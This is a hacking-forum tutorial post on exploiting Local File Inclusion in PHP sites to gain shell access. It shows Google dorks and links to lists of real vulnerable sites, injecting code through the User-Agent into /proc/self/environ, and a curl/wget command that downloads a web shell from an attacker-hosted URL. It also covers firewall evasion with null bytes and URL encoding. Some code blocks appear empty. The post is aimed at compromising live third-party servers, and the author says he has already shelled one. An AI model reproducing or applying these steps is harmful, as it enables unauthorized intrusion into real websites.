[TUT] LFI (Uploading Shell) [Pics/Video]

Hey guys, today I'm going to be going over a brief tutorial on what LFI is, and how to use it to get shell access.

LFI stands for Local File Inclusion, which gives you access to read files on a server through your web browser.





A vulnerable link looks something like this:
Code:
www.site.com/index.php?page=/etc/passwd

Here's what the code looks like that makes it vulnerable.
Code:

First off, you're going to need a few things.

1. FireFox
2. Tamper Data
3. Vulnerable Sites

Here's a few threads with vulnerable links.
LFI Sites #1
LFI Sites #2
LFI Sites #3
LFI Sites #4
LFI Sites #5
LFI Sites #6

If you can't find any good ones from those lists, use google dorks to find some.
Here's a few dorks.

Code:
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

I'm going to be showing you how to exploit LFI and get your shell uploaded via /proc/self/environ

So after you got your site, try checking if you can access /etc/passwd.

Your page should come up with something that looks like this.

Good, now we know that site is vulnerable.

Now we need to check for /proc/self/environ

So change your path to /proc/self/environ

Your page should look something like this if the file exists, not all sites have it.

The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.

To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.


Now you should have a window that looks like this.

So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.

We're going to try some code injection.

After you start tampering, you should see a window that looks something like this:

In the User-Agent field, type:
Code:

Now when your site is down loading, you should get an image that looks something like this if you did it correctly.


Now we know we can execute code, so let's get our shell uploaded using wget.

Open TamperData again, click start tamper, and refresh your site. This time, on the User-Agent enter this:

Code:
It should look like this:


This downloads that text file, and renames it as a php file (your shell).

You can upload your shell as a text file using free webhosting...I already shelled a site, so I'm gonna use that site as file hosting.

Once you're done with that, you can try and access your shell directly by going to site/shell.php

If you get an error, try using the same method as when you got your vulnerable link.
Example:

Code:
http://www.site.com/index.php?page=/etc/passwd

Load your shell by using the same method.

Code:
http://www.site.com/index.php?page=shell.php

If it loads fine the second time, you can upload a file using your shell to directly access it.

When you're all done, you have a sexy shell, kinda like this :3

Alternate Methods
Sometimes sites will take extra precaution to prevent attacks like these.
Here is an alternate method.

Change your user agent to:

Code:

Now load your url as:
Code:
/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php

So your url should look like:

Code:
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php

Now hopefully you got around it, and got your shell uploaded.
Special thanks to Hooded Robin for all the help he's given me with LFI.
I recommend you take a look at his video tutorial using Burp Suite.
You can check it out Here
Thanks alot <3

If you guys need anything, post here or feel free to PM me. I'll get back to you as soon as I can.

Filter Evasion

As you know, some sites have Web Application Firewalls, or WAFs installed. In order to bypass these, here's a few techniques you can try.

Null Bytes

Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.

Example:

Code:
http://www.site.com/index.php?page=/etc/passwd

It's pretty basic.

URL Encoding.

Here's another method, url encoding.

Encode your slashes, or unallowed characters to bypass these.

Code:
http://www.site.com/index.php?page=%2fetc%2fpasswd


-DownFall